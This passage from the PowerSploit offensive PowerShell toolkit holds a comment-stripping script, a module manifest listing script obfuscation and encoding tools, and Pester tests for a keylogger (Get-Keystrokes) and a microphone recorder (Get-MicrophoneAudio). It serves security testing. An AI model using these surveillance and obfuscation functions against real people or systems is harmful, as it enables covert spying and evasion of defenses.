78 | )
79 |
80 | Set-StrictMode -Version 2
81 |
82 | if ($PSBoundParameters['Path'])
83 | {
84 | Get-ChildItem $Path -ErrorAction Stop | Out-Null
85 | $ScriptBlockString = [IO.File]::ReadAllText((Resolve-Path $Path))
86 | $ScriptBlock = [ScriptBlock]::Create($ScriptBlockString)
87 | }
88 | else
89 | {
90 | # Convert the scriptblock to a string so that it can be referenced with array notation
91 | $ScriptBlockString = $ScriptBlock.ToString()
92 | }
93 |
94 | # Tokenize the scriptblock and return all tokens except for comments
95 | $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptBlock, [Ref] $Null) | Where-Object { $_.Type -ne 'Comment' }
96 |
97 | $StringBuilder = New-Object Text.StringBuilder
98 |
99 | # The majority of the remaining code comes from Lee Holmes' Show-ColorizedContent script.
100 | $CurrentColumn = 1
101 | $NewlineCount = 0
102 | foreach($CurrentToken in $Tokens)
103 | {
104 | # Now output the token
105 | if(($CurrentToken.Type -eq 'NewLine') -or ($CurrentToken.Type -eq 'LineContinuation'))
106 | {
107 | $CurrentColumn = 1
108 | # Only insert a single newline. Sequential newlines are ignored in order to save space.
109 | if ($NewlineCount -eq 0)
110 | {
111 | $StringBuilder.AppendLine() | Out-Null
112 | }
113 | $NewlineCount++
114 | }
115 | else
116 | {
117 | $NewlineCount = 0
118 |
119 | # Do any indenting
120 | if($CurrentColumn -lt $CurrentToken.StartColumn)
121 | {
122 | # Insert a single space in between tokens on the same line. Extraneous whiltespace is ignored.
123 | if ($CurrentColumn -ne 1)
124 | {
125 | $StringBuilder.Append(' ') | Out-Null
126 | }
127 | }
128 |
129 | # See where the token ends
130 | $CurrentTokenEnd = $CurrentToken.Start + $CurrentToken.Length - 1
131 |
132 | # Handle the line numbering for multi-line strings
133 | if(($CurrentToken.Type -eq 'String') -and ($CurrentToken.EndLine -gt $CurrentToken.StartLine))
134 | {
135 | $LineCounter = $CurrentToken.StartLine
136 | $StringLines = $(-join $ScriptBlockString[$CurrentToken.Start..$CurrentTokenEnd] -split '`r`n')
137 |
138 | foreach($StringLine in $StringLines)
139 | {
140 | $StringBuilder.Append($StringLine) | Out-Null
141 | $LineCounter++
142 | }
143 | }
144 | # Write out a regular token
145 | else
146 | {
147 | $StringBuilder.Append((-join $ScriptBlockString[$CurrentToken.Start..$CurrentTokenEnd])) | Out-Null
148 | }
149 |
150 | # Update our position in the column
151 | $CurrentColumn = $CurrentToken.EndColumn
152 | }
153 | }
154 |
155 | Write-Output ([ScriptBlock]::Create($StringBuilder.ToString()))
156 | }
157 |
--------------------------------------------------------------------------------
/ScriptModification/ScriptModification.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'ScriptModification.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Script Preparation/Modification Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = '*'
26 |
27 | # List of all files packaged with this module
28 | FileList = 'ScriptModification.psm1', 'ScriptModification.psd1', 'Out-CompressedDll.ps1', 'Out-EncodedCommand.ps1',
29 | 'Out-EncryptedScript.ps1', 'Remove-Comments.ps1', 'Usage.md'
30 |
31 | }
32 |
--------------------------------------------------------------------------------
/ScriptModification/ScriptModification.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
2 |
--------------------------------------------------------------------------------
/ScriptModification/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire ScriptModification folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module ScriptModification`
7 |
8 | To see the commands imported, type `Get-Command -Module ScriptModification`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/Tests/Exfiltration.tests.ps1:
--------------------------------------------------------------------------------
1 | Set-StrictMode -Version Latest
2 |
3 | $TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent
4 | $ModuleRoot = Resolve-Path "$TestScriptRoot\.."
5 | $ModuleManifest = "$ModuleRoot\Exfiltration\Exfiltration.psd1"
6 |
7 | Remove-Module [E]xfiltration
8 | Import-Module $ModuleManifest -Force -ErrorAction Stop
9 |
10 | Describe 'Get-Keystrokes' {
11 |
12 | if (Test-Path "$($env:TEMP)\key.log") { Remove-Item -Force "$($env:TEMP)\key.log" }
13 | $WindowTitle = (Get-Process -Id $PID).MainWindowTitle
14 |
15 | $Shell = New-Object -ComObject wscript.shell
16 | $Shell.AppActivate($WindowTitle)
17 |
18 | $KeyLogger = Get-Keystrokes -PassThru
19 | Start-Sleep -Seconds 1
20 |
21 | $Shell.SendKeys("Pester`b`b`b`b`b`b")
22 | $KeyLogger.Dispose()
23 |
24 | It 'Should output to file' { Test-Path "$($env:TEMP)\key.log" | Should Be $true }
25 |
26 | $KeyObjects = Get-Content -Path "$($env:TEMP)\key.log" | ConvertFrom-Csv
27 |
28 | It 'Should log keystrokes' {
29 | $FileLength = (Get-Item "$($env:TEMP)\key.log").Length
30 | $FileLength | Should BeGreaterThan 14
31 | }
32 |
33 | It 'Should get foreground window title' {
34 | $KeyObjects[0].WindowTitle | Should Be $WindowTitle
35 | }
36 |
37 | It 'Should log time of key press' {
38 | $KeyTime = [DateTime]::Parse($KeyObjects[0].Time)
39 | $KeyTime.GetType().Name | Should Be 'DateTime'
40 | }
41 |
42 | It 'Should stop logging after timeout' {
43 |
44 | $Timeout = 0.05
45 | $KeyLogger = Get-Keystrokes -Timeout $Timeout -PassThru
46 |
47 | Start-Sleep -Seconds 4
48 |
49 | $KeyLogger.Runspace.RunspaceAvailability | Should Be 'Available'
50 | $KeyLogger.Dispose()
51 | }
52 |
53 | Remove-Item -Force "$($env:TEMP)\key.log"
54 | }
55 |
56 | Describe "Get-MicrophoneAudio" {
57 |
58 | $RecordPath = "$env:TEMP\test_record.wav"
59 | $RecordLen = 2
60 | Context 'Successful Recording' {
61 | BeforeEach {
62 | #Ensure the recording as been removed prior to testing
63 | Remove-Item -Path $RecordPath -ErrorAction SilentlyContinue
64 | }
65 |
66 | AfterEach {
67 | #Remove the recording after testing
68 | Remove-Item -Path $RecordPath -ErrorAction SilentlyContinue
69 | }
70 |
71 | It 'should record audio from the microphone and save it to a specified path' {
72 | $result = Get-MicrophoneAudio -Path $RecordPath -Length $RecordLen
73 | $result | Should Not BeNullOrEmpty
74 | $result.Length | Should BeGreaterThan 0
75 | }
76 |
77 | }
78 |
79 | Context 'Invalid Arguments' {
80 | It 'should not allow invalid paths to be used' {
81 | { Get-MicrophoneAudio -Path "c:\FAKEPATH\yay.wav" -Length RecordLen} | Should Throw
82 | }
83 | }
84 |
85 | }
86 |
--------------------------------------------------------------------------------
/Tests/PowerSploit.tests.ps1:
--------------------------------------------------------------------------------
1 | Set-StrictMode -Version Latest
2 |
3 | $TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent
4 | $ModuleRoot = Resolve-Path "$TestScriptRoot\.."
5 |
6 | filter Assert-NotLittleEndianUnicode {
7 | [CmdletBinding()]
8 | param (
9 | [Parameter(Mandatory = $True,
10 | ValueFromPipelineByPropertyName = $True,
11 | ValueFromPipeline = $True)]
12 | [Alias('FullName')]
13 | [String[]]
14 | $FilePath
15 | )
16 |
17 | $LittleEndianMarker = 48111 # 0xBBEF
18 |
19 | Write-Verbose "Current file: $FilePath"
20 | Write-Debug "Current file: $FilePath"
21 |
22 | if ([System.IO.Directory]::Exists($FilePath)) {
23 | Write-Debug "File is a directory."
24 | return
25 | }
26 |
27 | if (-not [System.IO.File]::Exists($FilePath)) {
28 | Write-Debug "File does not exist."
29 | return
30 | }
31 |
32 | $FileBytes = Get-Content -TotalCount 3 -Encoding Byte -Path $FilePath
33 |
34 | if ($FileBytes.Length -le 2) {
35 | Write-Debug "File must be at least 2 bytes in length."
36 | return
37 | }
38 |
39 | if ([BitConverter]::ToUInt16($FileBytes, 0) -eq $LittleEndianMarker) {
40 | Write-Debug "File contains little endian unicode marker."
41 | throw "$_ is little-endian unicode encoded."
42 | }
43 | }
44 |
45 | Describe 'ASCII encoding of all scripts' {
46 | It 'should not contain little-endian unicode encoded scripts or modules' {
47 | { Get-ChildItem -Path $ModuleRoot -Recurse -Include *.ps1,*.psd1,*.psm1 | Assert-NotLittleEndianUnicode } | Should Not Throw
48 | }
49 | }
--------------------------------------------------------------------------------